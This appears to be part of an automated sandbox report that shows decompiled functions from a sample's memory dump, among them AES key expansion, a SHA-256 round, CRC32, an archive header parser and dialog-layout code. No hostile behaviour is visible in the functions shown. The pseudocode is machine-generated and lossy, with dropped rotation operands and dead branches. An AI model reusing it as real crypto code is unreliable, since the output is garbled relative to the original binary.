              0x00d7dce9
              0x00d7dcf5
              0x00d7dcfc
              0x00d7dd03
              0x00d7dd0a
              0x00d7dd11
              0x00d7dd18
              0x00d7dd1f
              0x00d7dd26
              0x00d7dd2f
              0x00d7dd43
              0x00d7dd31
              0x00d7dd39
              0x00d7dd39
              0x00d7dd45
              0x00d7dd4c
              0x00d7dd53
              0x00d7dd5a
              0x00d7dd61
              0x00d7dd68
              0x00d7dd6f
              0x00d7dd76
              0x00d7dd7f
              0x00d7dd93
              0x00d7dd81
              0x00d7dd89
              0x00d7dd89
              0x00d7dd95
              0x00d7dd9c
              0x00d7dda3
              0x00d7ddaa
              0x00d7ddb1
              0x00d7ddb2
              0x00d7ddb9
              0x00d7ddc0
              0x00d7ddc7
              0x00d7ddce
              0x00d7dddf

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a2b1205d59308fbef098f8c9986c272e403103370ebb36e50005a93d929a8f82
              • Instruction ID: d4772b5e523b31b7a5612055729839c9aaab33b9ee138599c9ab03e4fbb3bf73
              • Opcode Fuzzy Hash: a2b1205d59308fbef098f8c9986c272e403103370ebb36e50005a93d929a8f82
              • Instruction Fuzzy Hash: 80816D822193D4DDC7068F3D38A02B53EA29B77341B1D82AA84DAC7367E47A8659D731
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7E510, Relevance: .2, Instructions: 154COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D7E510(intOrPtr __ecx, signed char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				intOrPtr _t137;
				signed char* _t139;
				void* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E00D8EA80( &_v32, _a4, 0x20);
				_t141 =  &_v40 + 0xc;
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0xdb4330;
						do {
							_v32 = _v32 ^  *(( *(_t141 + 0x15 + _t135 * 4) & 0x000000ff) + 0xdb4130);
							_v31 = _v31 ^  *(( *(_t141 + 0x16 + _t135 * 4) & 0x000000ff) + 0xdb4130);
							_v30 = _v30 ^  *(( *(_t141 + 0x17 + _t135 * 4) & 0x000000ff) + 0xdb4130);
							_v29 = _v29 ^  *(( *(_t141 + 0x14 + _t135 * 4) & 0x000000ff) + 0xdb4130);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_a4 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_a4;
									 *_t58 = _a4 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_a4 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xdb4130);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xdb4130);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xdb4130);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xdb4130);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_a4;
									 *_t79 = _a4 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_a4 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_a4;
										 *_t53 = _a4 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_a4 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _a4 + 4;
											_t133 = _t133 + 1;
											_a4 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}






































              0x00d7e516
              0x00d7e526
              0x00d7e529
              0x00d7e52e
              0x00d7e532
              0x00d7e537
              0x00d7e53a
              0x00d7e53c
              0x00d7e53e
              0x00d7e542
              0x00d7e589
              0x00d7e58c
              0x00d7e592
              0x00d7e597
              0x00d7e5a6
              0x00d7e5b5
              0x00d7e5c4
              0x00d7e5d3
              0x00d7e5d7
              0x00d7e5d9
              0x00d7e5de
              0x00d7e5e5
              0x00d7e616
              0x00d7e61a
              0x00d7e622
              0x00d7e624
              0x00d7e625
              0x00d7e628
              0x00d7e62a
              0x00d7e62b
              0x00d7e62b
              0x00d7e630
              0x00d7e630
              0x00d7e630
              0x00d7e63c
              0x00d7e640
              0x00d7e64e
              0x00d7e65d
              0x00d7e66c
              0x00d7e67b
              0x00d7e67f
              0x00d7e681
              0x00d7e682
              0x00d7e682
              0x00d7e685
              0x00d7e687
              0x00d7e688
              0x00d7e688
              0x00d7e68d
              0x00d7e68d
              0x00d7e68d
              0x00d7e5e7
              0x00d7e5ea
              0x00d7e5f3
              0x00d7e5f7
              0x00d7e5fb
              0x00d7e5fb
              0x00d7e5fd
              0x00d7e5fd
              0x00d7e601
              0x00d7e604
              0x00d7e605
              0x00d7e60a
              0x00d7e60d
              0x00d7e60d
              0x00d7e60d
              0x00d7e614
              0x00d7e5ea
              0x00d7e694
              0x00d7e698
              0x00d7e6d9
              0x00d7e6d9
              0x00000000
              0x00d7e69a
              0x00d7e6a1
              0x00d7e6cd
              0x00d7e6cd
              0x00d7e6a3
              0x00d7e6a7
              0x00d7e6aa
              0x00d7e6ae
              0x00d7e6b8
              0x00d7e6bc
              0x00d7e6c1
              0x00d7e6c4
              0x00d7e6c5
              0x00d7e6cb
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7e6cb
              0x00d7e6ae
              0x00d7e6d0
              0x00d7e6d0
              0x00d7e6d2
              0x00d7e6d3
              0x00d7e6d3
              0x00d7e6d7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7e6d7
              0x00d7e69a
              0x00d7e6dc
              0x00d7e6dc
              0x00d7e6dc
              0x00d7e597
              0x00000000
              0x00d7e544
              0x00d7e54f
              0x00d7e555
              0x00d7e559
              0x00d7e562
              0x00d7e565
              0x00d7e568
              0x00d7e569
              0x00d7e56c
              0x00d7e56d
              0x00d7e571
              0x00d7e577
              0x00000000
              0x00000000
              0x00000000
              0x00d7e577
              0x00d7e579
              0x00d7e579
              0x00d7e580
              0x00d7e582
              0x00d7e583
              0x00d7e583
              0x00d7e587
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7e587
              0x00d7e544
              0x00d7e6ed
              0x00d7e6ed

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 560db48347fa01e1993f1c17c3ff53100a35756b455b9144727063af76f73aac
              • Instruction ID: c7288de7919d6064db49321e8eb8c13f79c1c328b0e9bb7c8f7ffa55d16c3fe6
              • Opcode Fuzzy Hash: 560db48347fa01e1993f1c17c3ff53100a35756b455b9144727063af76f73aac
              • Instruction Fuzzy Hash: 9751A43190C3959EC712CF29919446EBFE1AFAE318F4988DEE4D94B213E131D649CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7F5C5, Relevance: .1, Instructions: 131COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 80%
              			E00D7F5C5() {
				signed int _t85;
				signed int* _t86;
				unsigned int* _t87;
				void* _t88;
				unsigned int _t90;
				unsigned int _t113;
				signed int _t115;
				signed int* _t120;
				signed int _t121;
				signed int* _t122;
				signed int _t123;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t140;

				_t120 =  *(_t140 + 0x130);
				_t123 = 0;
				_t86 =  &(_t120[0xa]);
				do {
					 *((intOrPtr*)(_t140 + 0x30 + _t123 * 4)) = E00D95604( *_t86);
					_t86 =  &(_t86[1]);
					_t123 = _t123 + 1;
				} while (_t123 < 0x10);
				_t87 = _t140 + 0x68;
				_t137 = 0x30;
				do {
					_t90 =  *(_t87 - 0x34);
					_t113 =  *_t87;
					asm("rol esi, 0xe");
					_t87 =  &(_t87[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t87[1] = (_t90 ^ _t90 ^ _t90 >> 0x00000003) + (_t113 ^ _t113 ^ _t113 >> 0x0000000a) +  *((intOrPtr*)(_t87 - 0x3c)) +  *((intOrPtr*)(_t87 - 0x18));
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_t88 = 0;
				_t138 = _t120[4];
				_t115 = _t120[5];
				 *(_t140 + 0x10) = _t120[1];
				 *(_t140 + 0x20) = _t120[3];
				 *(_t140 + 0x1c) =  *_t120;
				 *(_t140 + 0x18) = _t120[6];
				_t121 =  *(_t140 + 0x1c);
				 *(_t140 + 0x14) = _t120[2];
				 *(_t140 + 0x24) = _t120[7];
				while(1) {
					 *(_t140 + 0x28) = _t138;
					asm("ror esi, 0xb");
					asm("rol eax, 0x7");
					asm("ror eax, 0x6");
					 *(_t140 + 0x18) = _t115;
					_t33 = _t88 + 0xda2780; // 0x0
					_t135 = (_t138 ^ _t138 ^ _t138) + ( !_t138 &  *(_t140 + 0x18) ^ _t115 & _t138) +  *_t33 +  *((intOrPtr*)(_t140 + _t88 + 0x2c));
					_t88 = _t88 + 4;
					_t136 = _t135 +  *(_t140 + 0x24);
					 *(_t140 + 0x24) =  *(_t140 + 0x18);
					_t138 =  *(_t140 + 0x20) + _t136;
					asm("ror edx, 0xd");
					asm("rol eax, 0xa");
					asm("ror eax, 0x2");
					_t85 =  *(_t140 + 0x10);
					 *(_t140 + 0x10) = _t121;
					 *(_t140 + 0x20) =  *(_t140 + 0x14);
					 *(_t140 + 0x14) = _t85;
					_t121 = (_t121 ^ _t121 ^ _t121) + (( *(_t140 + 0x14) ^  *(_t140 + 0x10)) & _t121 ^  *(_t140 + 0x14) &  *(_t140 + 0x10)) + _t136;
					if(_t88 >= 0x100) {
						break;
					}
					_t115 =  *(_t140 + 0x28);
				}
				 *(_t140 + 0x1c) = _t121;
				_t122 =  *(_t140 + 0x130);
				 *_t122 =  *_t122 +  *(_t140 + 0x1c);
				_t122[1] = _t122[1] +  *(_t140 + 0x10);
				_t122[2] = _t122[2] + _t85;
				_t122[3] = _t122[3] +  *(_t140 + 0x20);
				_t122[5] = _t122[5] +  *(_t140 + 0x28);
				_t122[6] = _t122[6] +  *(_t140 + 0x18);
				_t122[4] = _t122[4] + _t138;
				_t122[7] = _t122[7] +  *(_t140 + 0x24);
				return _t85;
			}



















              0x00d7f5cf
              0x00d7f5d6
              0x00d7f5d8
              0x00d7f5db
              0x00d7f5e2
              0x00d7f5e6
              0x00d7f5e9
              0x00d7f5eb
              0x00d7f5f2
              0x00d7f5f6
              0x00d7f5f7
              0x00d7f5f7
              0x00d7f5fc
              0x00d7f600
              0x00d7f603
              0x00d7f606
              0x00d7f614
              0x00d7f617
              0x00d7f629
              0x00d7f62c
              0x00d7f62c
              0x00d7f634
              0x00d7f638
              0x00d7f63b
              0x00d7f63e
              0x00d7f645
              0x00d7f64c
              0x00d7f653
              0x00d7f65a
              0x00d7f65e
              0x00d7f662
              0x00d7f66c
              0x00d7f66e
              0x00d7f672
              0x00d7f677
              0x00d7f686
              0x00d7f69b
              0x00d7f69f
              0x00d7f6a7
              0x00d7f6ab
              0x00d7f6ae
              0x00d7f6b2
              0x00d7f6b6
              0x00d7f6b8
              0x00d7f6bd
              0x00d7f6c4
              0x00d7f6db
              0x00d7f6e1
              0x00d7f6e9
              0x00d7f6ed
              0x00d7f6f1
              0x00d7f6fa
              0x00000000
              0x00000000
              0x00d7f668
              0x00d7f668
              0x00d7f700
              0x00d7f704
              0x00d7f70f
              0x00d7f715
              0x00d7f71a
              0x00d7f721
              0x00d7f728
              0x00d7f72f
              0x00d7f732
              0x00d7f739
              0x00d7f746

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 90154f3263386118764e3438b359276cbd9db4fb6824c0eb441fb9f5062a746b
              • Instruction ID: 603afce208e7972070bae7f3888bf43626e98e0fd4960cfc817dfc663956dc89
              • Opcode Fuzzy Hash: 90154f3263386118764e3438b359276cbd9db4fb6824c0eb441fb9f5062a746b
              • Instruction Fuzzy Hash: 785126B1A083028FC748CF19D49055AF7E1FF88314F058A2EE899A7740DB34EA59CB96
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D833D3, Relevance: .1, Instructions: 112COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D833D3(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x1c);
				_t61 = 0;
				_t86 =  *(_t91 + 0x24);
				_t89 = __ecx;
				 *(_t91 + 0x14) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00D84422(__ecx) != 0) {
					E00D7A4D1(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x14) = E00D7A4E8(_t88) >> 8;
					E00D7A4D1(_t88, 8);
					_t66 =  *(_t91 + 0x10) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x20)) = _t39;
					if(_t39 == 4) {
						goto L3;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x1c) = E00D7A4E8(_t88) >> 8;
					E00D7A4D1(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x20)) <= _t61) {
						L9:
						_t84 =  *(_t91 + 0x10);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x18))) {
							goto L3;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x20));
					_t90 = _t61;
					do {
						_t55 = E00D7A4E8(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x24);
					_t89 =  *(_t91 + 0x14);
					goto L9;
				} else {
					L3:
					return 0;
				}
			}


















              0x00d833d9
              0x00d833dd
              0x00d833e0
              0x00d833e4
              0x00d833e6
              0x00d833ea
              0x00d833f0
              0x00d8341a
              0x00d8342d
              0x00d83431
              0x00d8343a
              0x00d83445
              0x00d83446
              0x00d8344d
              0x00000000
              0x00000000
              0x00d83456
              0x00d83459
              0x00d8346a
              0x00d8346e
              0x00d83477
              0x00d834b2
              0x00d834b2
              0x00d834c2
              0x00d834cf
              0x00000000
              0x00000000
              0x00d834d5
              0x00d834d7
              0x00d834da
              0x00d834dd
              0x00d834e3
              0x00d834e7
              0x00d834e9
              0x00d834e9
              0x00d834eb
              0x00d834fb
              0x00d83500
              0x00000000
              0x00d83500
              0x00d83479
              0x00d8347d
              0x00d8347f
              0x00d8348b
              0x00d8348d
              0x00d83493
              0x00d83495
              0x00d834a0
              0x00d834a2
              0x00d834a5
              0x00d834a5
              0x00d834aa
              0x00d834ae
              0x00000000
              0x00d83408
              0x00d83408
              0x00000000
              0x00d83408

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
              • Instruction ID: 029a2bf8b15c31870847f984c9f27a43b89c8fd1cbb77ce8200934932a975003
              • Opcode Fuzzy Hash: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
              • Instruction Fuzzy Hash: 5F31BFB16047198FCB14EE2CC85126EBBE0FB95704F04892DE98DD7741D675EA0ACBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D75D7E, Relevance: .1, Instructions: 76COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D75D7E(signed char _a4, signed char _a8, unsigned int _a12) {
				signed char _t49;
				signed char _t51;
				signed char _t67;
				signed char _t68;
				unsigned int _t72;
				unsigned int _t74;

				_t67 = _a8;
				_t49 = _a4;
				_t74 = _a12;
				if(_t74 != 0) {
					while((_t67 & 0x00000007) != 0) {
						_t49 = _t49 >> 0x00000008 ^  *(0xdae040 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_a8 = _t67;
						_t74 = _t74 - 1;
						if(_t74 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				if(_t74 >= 8) {
					_t72 = _t74 >> 3;
					do {
						_t51 = _t49 ^  *_t67;
						_t74 = _t74 - 8;
						_t68 =  *(_t67 + 4);
						_t67 = _a8 + 8;
						_a8 = _t67;
						_t49 =  *(0xdae040 + (_t68 >> 0x18) * 4) ^  *(0xdae440 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xdae840 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xdaf040 + (_t51 >> 0x18) * 4) ^  *(0xdaf440 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xdaf840 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xdaec40 + (_t68 & 0x000000ff) * 4) ^  *(0xdafc40 + (_t51 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				if(_t74 != 0) {
					do {
						_t49 = _t49 >> 0x00000008 ^  *(0xdae040 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_t74 = _t74 - 1;
					} while (_t74 != 0);
				}
				return _t49;
			}









              0x00d75d81
              0x00d75d85
              0x00d75d89
              0x00d75d8e
              0x00d75d90
              0x00d75da0
              0x00d75da7
              0x00d75da8
              0x00d75dab
              0x00d75dae
              0x00000000
              0x00000000
              0x00000000
              0x00d75dae
              0x00d75d90
              0x00d75db0
              0x00d75db3
              0x00d75dbc
              0x00d75dbf
              0x00d75dbf
              0x00d75dc1
              0x00d75dc4
              0x00d75e21
              0x00d75e24
              0x00d75e38
              0x00d75e3a
              0x00d75e3a
              0x00d75e3f
              0x00d75e42
              0x00d75e44
              0x00d75e4f
              0x00d75e56
              0x00d75e57
              0x00d75e57
              0x00d75e44
              0x00d75e61

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9f8d2887a62dcf92ba7f3f0506e97102f971bc5345179d81f33f10f6d67b1bc5
              • Instruction ID: d86b8e7e0c43134b22ff8f07639977c2a3d37712c089f57aa8f22243f6e6444e
              • Opcode Fuzzy Hash: 9f8d2887a62dcf92ba7f3f0506e97102f971bc5345179d81f33f10f6d67b1bc5
              • Instruction Fuzzy Hash: 5821D731A202214BCB08CF2DECA457A7751A78B31174A822BEE46DF385D578E925C7F1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7D70B, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 235COMMON
              Download Yara Rule
              C-Code - Quality: 75%
              			E00D7D70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				signed int _t104;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				signed int _t185;
				struct HWND__* _t186;
				struct HWND__* _t187;
				void* _t188;
				void* _t191;
				signed int _t192;
				long _t193;
				void* _t200;
				int* _t201;
				struct HWND__* _t202;
				void* _t204;
				void* _t205;
				void* _t207;
				void* _t209;
				void* _t213;

				_t202 = __ecx;
				_v2368.bottom = __ecx;
				E00D73E41( &_v2208, 0x50, L"$%s:", _a8);
				_t207 =  &_v2368 + 0x10;
				E00D811FA( &_v2208,  &_v2288, 0x50);
				_t96 = E00D92BB0( &_v2300);
				_t186 = _v8;
				_t155 = 0;
				_v2376 = _t96;
				_t209 =  *0xdad5f4 - _t155; // 0x63
				if(_t209 <= 0) {
					L8:
					_t156 = E00D7CD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t186,  &_v2352);
					GetClientRect(_t186,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t104 = _v2320.bottom;
					_t191 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t204 = _t191 - _v2304;
					_v2368.bottom = _t169 - _t104;
					if(_t156 == 0) {
						L15:
						_t221 = _a12;
						if(_a12 == 0 && E00D7CE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t186,  &_v2048);
						}
						L18:
						_t205 = _t204 - GetSystemMetrics(8);
						_t106 = GetWindow(_t186, 5);
						_t187 = _t106;
						_v2368.bottom = _t187;
						if(_t156 == 0) {
							L24:
							return _t106;
						}
						_t157 = 0;
						while(_t187 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t187,  &_v2320);
							_t170 = _v2320.top.left;
							_t192 = 0x64;
							asm("cdq");
							_t193 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xdadfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
							_t106 = GetWindow(_t187, 2);
							_t187 = _t106;
							__eflags = _t187 - _v2384;
							if(_t187 == _v2384) {
								goto L24;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t158 = 0x64;
					asm("cdq");
					_t134 = _v2292 * _v2368.top;
					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
					_v2324 = _t160;
					asm("cdq");
					_t185 = _t134 % _v2352.top;
					_v2352.left = _t134 / _v2352.top + _t204;
					asm("cdq");
					asm("cdq");
					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
					if(_t163 < 0) {
						_t163 = 0;
					}
					if(_t200 < 0) {
						_t200 = 0;
					}
					 *0xdadfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t186,  &_v2368);
					_t156 = _v2393;
					goto L15;
				} else {
					_t201 = 0xdad154;
					do {
						if( *_t201 > 0) {
							_t9 =  &(_t201[1]); // 0xda33e0
							_t150 = E00D95460( &_v2288,  *_t9, _t96);
							_t207 = _t207 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t201[1]); // 0xda33e0
								if(E00D7CF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
